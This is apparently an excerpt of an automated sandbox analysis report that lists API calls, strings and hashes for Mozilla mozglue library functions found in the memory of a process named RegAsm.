                                                                              • Part of subcall function 6CC3EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3EB83
                                                                            • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CC7B392,?,?,00000001), ref: 6CC791F4
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                            • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                            • API String ID: 3790164461-3347204862
                                                                            • Opcode ID: 636f2ccf26a5ee0907b789879e4e718fcd2caddc5bf4bb09952b97df2e5aafbf
                                                                            • Instruction ID: 0c4efa25f905736eceef55707aba2a532bc01767e8cc9e2cc0dd2c328e6e6fd5
                                                                            • Opcode Fuzzy Hash: 636f2ccf26a5ee0907b789879e4e718fcd2caddc5bf4bb09952b97df2e5aafbf
                                                                            • Instruction Fuzzy Hash: 97B1C4B0A0120A9BDB14CFA9C895BEEBBB5FF85358F104019D905ABF80F7319945CBE1
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC5C5A3
                                                                            • WideCharToMultiByte.KERNEL32 ref: 6CC5C9EA
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC5C9FB
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CC5CA12
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC5CA2E
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC5CAA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                            • String ID: (null)$0
                                                                            • API String ID: 4074790623-38302674
                                                                            • Opcode ID: 2819172353aa728e3dac5af3b3757e855eb0986eb86c10ce2db094ef8050daf8
                                                                            • Instruction ID: 0d33ddf7d7e43faeb4ab26ca9b4bae91f20132de202599faa0f6807b7c72b0ef
                                                                            • Opcode Fuzzy Hash: 2819172353aa728e3dac5af3b3757e855eb0986eb86c10ce2db094ef8050daf8
                                                                            • Instruction Fuzzy Hash: C9A19C716083429FDB00DF29C98475ABBF1FF89748F44882DE899D7641EB31D825CB9A
                                                                            APIs
                                                                            • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC5C784
                                                                            • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC5C801
                                                                            • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6CC5C83D
                                                                            • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC5C891
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                            • String ID: INF$NAN$inf$nan
                                                                            • API String ID: 1991403756-4166689840
                                                                            • Opcode ID: e7d4d5bb30827784ae3fc954e276b9615268e6332ef3ea422cef169ddb1e82cc
                                                                            • Instruction ID: 4c7851381f7f93ec6a11652519b002619245002b9f1df180a070a7477c6520a2
                                                                            • Opcode Fuzzy Hash: e7d4d5bb30827784ae3fc954e276b9615268e6332ef3ea422cef169ddb1e82cc
                                                                            • Instruction Fuzzy Hash: 73517F709087408BD700EF6DC58129AFBF0BF9E348F408A2DE9D5A7651F770D9A58B46
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC33492
                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC334A9
                                                                            • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC334EF
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CC3350E
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC33522
                                                                            • __aulldiv.LIBCMT ref: 6CC33552
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC3357C
                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC33592
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                            • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: free$moz_xmalloc
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC6D9DB), ref: 6CC6F2D2
                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6CC6F2F5
                                                                            • moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6CC6F386
                                                                            • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6CC6F347
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6CC6F3C8
                                                                            • free.MOZGLUE(00000000,00000000), ref: 6CC6F3F3
                                                                            • free.MOZGLUE(00000000,00000000), ref: 6CC6F3FC
                                                                            • free.MOZGLUE(00000000,?,?,00000000), ref: 6CC6F413
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: freemoz_xmalloc$HandleModule$malloc
                                                                            • String ID: ntdll.dll
                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(6CCBF618), ref: 6CC96A68
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC96A7D
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC96AA1
                                                                            • EnterCriticalSection.KERNEL32(6CCBF618), ref: 6CC96AAE
                                                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96AE1
                                                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96B15
                                                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CC96B65
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF618,?,?), ref: 6CC96B83
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
                                                                            • String ID: SymInitialize
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC49675
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC49697
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC496E8
                                                                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC49707
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4971F
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49773
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC497B7
                                                                            • FreeLibrary.KERNEL32 ref: 6CC497D0
                                                                            • FreeLibrary.KERNEL32 ref: 6CC497EB
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49824
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                            • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC31EC1
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31EE1
                                                                            • EnterCriticalSection.KERNEL32(6CCBE744), ref: 6CC31F38
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE744), ref: 6CC31F5C
                                                                            • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC31F83
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FC0
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FE2
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FF6
                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC32019
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                            • String ID: MOZ_CRASH()
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32 ref: 6CC96009
                                                                            • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CC96024
                                                                            • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6CC3EE51,?), ref: 6CC96046
                                                                            • OutputDebugStringA.KERNEL32(?,6CC3EE51,?), ref: 6CC96061
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC96069
                                                                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC96073
                                                                            • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC96082
                                                                            • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6CCB148E), ref: 6CC96091
                                                                            • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6CC3EE51,00000000,?), ref: 6CC960BA
                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC960C4
                                                                            Similarity
                                                                            • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC80039
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC80041
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC80075
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC80082
                                                                            • moz_xmalloc.MOZGLUE(00000048), ref: 6CC80090
                                                                            • free.MOZGLUE(?), ref: 6CC80104
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC8011B
                                                                            Strings
                                                                            • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6CC8005B
                                                                            Similarity
                                                                            • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                            • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                            • API String ID: 3012294017-637075127
                                                                            • Opcode ID: 44fda56f94a84bc78a2f28d8a827dcd1ec677aaf2bede1531f218c491d51a28f
                                                                            • Instruction ID: 22c0f6446ab873f43d50a64293b96aeef2e6e76e590fc671d4a1a890a38f3f90
                                                                            • Opcode Fuzzy Hash: 44fda56f94a84bc78a2f28d8a827dcd1ec677aaf2bede1531f218c491d51a28f
                                                                            • Instruction Fuzzy Hash: D44180796016549FCB10CFA5C880A9BBBF1FF49318F40451DE95A93B50EB31E815CFA5
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC47EA7
                                                                            • malloc.MOZGLUE(00000001), ref: 6CC47EB3
                                                                              • Part of subcall function 6CC4CAB0: EnterCriticalSection.KERNEL32(?), ref: 6CC4CB49
                                                                              • Part of subcall function 6CC4CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CC4CBB6
                                                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CC47EC4
                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC47F19
                                                                            • malloc.MOZGLUE(?), ref: 6CC47F36
                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC47F4D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                            • String ID: d
                                                                            • API String ID: 204725295-2564639436
                                                                            • Opcode ID: 2f887633605dacda3c39dff14492903448098281593e64e40e4ad912cf8322ef
                                                                            • Instruction ID: b889903a3ecdc4c8aa6a2d9b55165ef10a0482e4a8d708589b91b3302115cd16
                                                                            • Opcode Fuzzy Hash: 2f887633605dacda3c39dff14492903448098281593e64e40e4ad912cf8322ef
                                                                            • Instruction Fuzzy Hash: 55310861E0474897EB009BA8DC449FEB778EF96308F049369ED4957612FB31A9C8C390
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6CC43EEE
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC43FDC
                                                                            • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6CC44006
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC440A1
                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC440AF
                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC440C2
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC44134
                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC44143
                                                                            • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC44157
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Free$Heap$StringUnicode$Allocate
                                                                            • String ID:
                                                                            • API String ID: 3680524765-0
                                                                            • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                            • Instruction ID: 14fd4fb397468fd9184bf2fffdb0c221c118ec1c83516fd763b5dbf68b263557
                                                                            • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                            • Instruction Fuzzy Hash: 57A172B1A00215CFEB40CF69C880659B7F5FF88314F29C599D909AF752E772D856CBA0
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(00000000,?,6CC53F47,?,?,?,6CC53F47,6CC51A70,?), ref: 6CC3207F
                                                                            • memset.VCRUNTIME140(?,000000E5,6CC53F47,?,6CC53F47,6CC51A70,?), ref: 6CC320DD
                                                                            • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6CC53F47,6CC51A70,?), ref: 6CC3211A
                                                                            • EnterCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC32145
                                                                            • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6CC53F47,6CC51A70,?), ref: 6CC321BA
                                                                            • EnterCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC321E0
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC32232
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                            • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                            • API String ID: 889484744-884734703
                                                                            • Opcode ID: c76313d9b5fe5cbf03be54c1b3f779727829591991bc0595671f8275b7cc2475
                                                                            • Instruction ID: 204fc627109df70c3c88df9551e345408041ca825da1858674256c2b6f525715
                                                                            • Opcode Fuzzy Hash: c76313d9b5fe5cbf03be54c1b3f779727829591991bc0595671f8275b7cc2475
                                                                            • Instruction Fuzzy Hash: 9861D331F002268FCF04CAA9DDA9B6E76B1AF85314F294239E528A7A95F7719C00C7C5
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6CC7483A,?), ref: 6CC34ACB
                                                                            • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6CC7483A,?), ref: 6CC34AE0
                                                                            • moz_xmalloc.MOZGLUE(FFFE15BF,?,6CC7483A,?), ref: 6CC34A82
                                                                              • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                            • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6CC7483A,?), ref: 6CC34A97
                                                                            • moz_xmalloc.MOZGLUE(15D4E801,?,6CC7483A,?), ref: 6CC34A35
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6CC7483A,?), ref: 6CC34A4A
                                                                            • moz_xmalloc.MOZGLUE(15D4E824,?,6CC7483A,?), ref: 6CC34AF4
                                                                            • moz_xmalloc.MOZGLUE(FFFE15E2,?,6CC7483A,?), ref: 6CC34B10
                                                                            • moz_xmalloc.MOZGLUE(8E8E0022,?,6CC7483A,?), ref: 6CC34B2C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                            • String ID:
                                                                            • API String ID: 4251373892-0
                                                                            • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                            • Instruction ID: 6891b6da4bcde1f6712743714a6eeca5b4cc3b6490a889f9630283d82afbf301
                                                                            • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                            • Instruction Fuzzy Hash: E0715BB19007069FC754CF69D580AAABBF5FF09308B10863ED15A9BB51F732E995CB80
                                                                            APIs
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC88273), ref: 6CC89D65
                                                                            • free.MOZGLUE(6CC88273,?), ref: 6CC89D7C
                                                                            • free.MOZGLUE(?,?), ref: 6CC89D92
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC89E0F
                                                                            • free.MOZGLUE(6CC8946B,?,?), ref: 6CC89E24
                                                                            • free.MOZGLUE(?,?,?), ref: 6CC89E3A
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC89EC8
                                                                            • free.MOZGLUE(6CC8946B,?,?,?), ref: 6CC89EDF
                                                                            • free.MOZGLUE(?,?,?,?), ref: 6CC89EF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                            • String ID:
                                                                            • API String ID: 956590011-0
                                                                            • Opcode ID: a73661cf76e04e04c3314912db0c496f9f0db4acfd5adc7d1b40183cf7e6ee5a
                                                                            • Instruction ID: 4a635acd91bfd117a0395710259883c8385e3520b466af2a8eec46a4ff0ec448
                                                                            • Opcode Fuzzy Hash: a73661cf76e04e04c3314912db0c496f9f0db4acfd5adc7d1b40183cf7e6ee5a
                                                                            • Instruction Fuzzy Hash: B9719EB090AB418BC712CF18C48055BFBF4FF99319B448659E89A5BB02FB30F895CB95
                                                                            APIs
                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CC8DDCF
                                                                              • Part of subcall function 6CC6FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC6FA4B
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DE0D
                                                                            • free.MOZGLUE(00000000), ref: 6CC8DE41
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DE5F
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DEA3
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DEE9
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC7DEFD,?,6CC44A68), ref: 6CC8DF32
                                                                              • Part of subcall function 6CC8DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DB86
                                                                              • Part of subcall function 6CC8DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DC0E
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC7DEFD,?,6CC44A68), ref: 6CC8DF65
                                                                            • free.MOZGLUE(?), ref: 6CC8DF80
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
